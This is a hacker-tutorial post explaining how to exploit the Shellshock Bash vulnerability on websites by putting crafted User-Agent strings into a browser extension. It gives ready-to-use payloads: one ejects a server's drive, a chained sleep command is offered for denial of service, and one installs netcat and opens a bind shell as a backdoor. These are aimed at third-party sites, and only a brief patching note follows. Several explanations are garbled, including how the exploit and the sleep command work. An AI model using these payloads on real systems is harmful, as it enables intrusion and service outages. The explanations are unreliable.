How To: Exploit Shellshock-Vulnerable Websites with Just a Web Browser

I'm sure that many of us have heard of that nasty Shellshock vulnerability, but not very many people know how to exploit it. Try these few tricks on vulnerable websites!

Background Information

So, what is Shellshock?

Shellshock is a vulnerability in Bash shell (v1.1 to v4.3, and possibly more...) that allows remote code execution without confirmation. This is an especially big vulnerability, as it removes the need for complex coding that can take years to perfect. A series of random characters, () { :; }; , confuses Bash because it doesn't know what to do with them, so by default, it executes the code after it. Over 100,000 attempts to exploit any Unix/Linux/OS X & iOS systems has already occurred. There are over 3,000 vulnerable websites, and that's without the amount of vulnerable hardware there is.

Ironically, Windows is completely safe from this vulnerability, which is good and bad at the same time. About 75%+ of the Internet is Apache, and 80% of Apache servers run on Linux, so almost the entire Internet is vulnerable.

Things You'll Need

There's this neat little extension for Firefox, Iceweasel, and now Chrome called User Agent Switcher that allows us to change our user agent in order to exploit this vulnerability.

Download it here for Firefox/Iceweasel. Download here for Chrome.

Eject DVD Drive

That's right! You can make the DVD drive of a Shellshock vulnerable PC pop open! Open up the Tools menu and move to the User Agent Switcher Menu (might say Default User Agent) and select Edit User Agents...

Click on New -> New User Agent... and in the User Agent: box, replace Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.2.0 with () { :; }; /bin/eject. The /bin/eject is the file/command that is stored in every Linux machine. This will eject the hard drive. You can name it whatever you like in the Description box. Press OK in both pop-up windows and open the User Agent Switcher menu again and select your eject code user agent. Then, visit a Shellshock vulnerable website, and the DVD drive of the hosting computer will pop open!

DoS a Website

I hope you all have heard of DoS (Denial of Service) attacks that can be taken by pinging the website with loads of bytes, but this is ineffective compared to what you can do with Shellshock!

Open the User Agent Switcher menu again and add another agent with the following code: () { :;}; /bin/sleep 20|/sbin/sleep 20|/usr/bin/sleep 20. The /bin/sleep is a command that makes the computer sleep. But by adding the number 20 after, Bash will now execute the command after 20 seconds. You can see that | pipes down through a few commands. This is because some OS's are different than others, so some commands may not work. But by piping them all together, Bash will try to execute all 3 commands to get us a better success. The way this works is, if you go to a vulnerable page with this code, and refresh 10 times, Bash will try to execute that code 10 times at the same time, resulting in slowing the computer down, and if you DDoS (Distributed Denial of Service) with this attack, you may even bring the server down temporarily.

Netcat Backdoor

Netcat is just a wonderful tool, and even greater with Shellshock.

Go ahead and create a new user agent with the code () { :;} ; apt-get install netcat; ncat -l -p 6996 -e /bin/sh. This will first install Netcat if the target doesn't already have it, and creates a listener with a shell as the process. Make sure you know the website's IP address when connecting!

Patching Your System

Shellshock is probably 10 times worse than Heartbleed (in my opinion), so visit your distro's website for patching information. If you are using Kali Linux, you can find the patch information at Debian's homepage. If you recently installed Kali, it might already be patched. Cx2H made a guide on how to tell if you are vulnerable, and how to patch it.

C|H of C3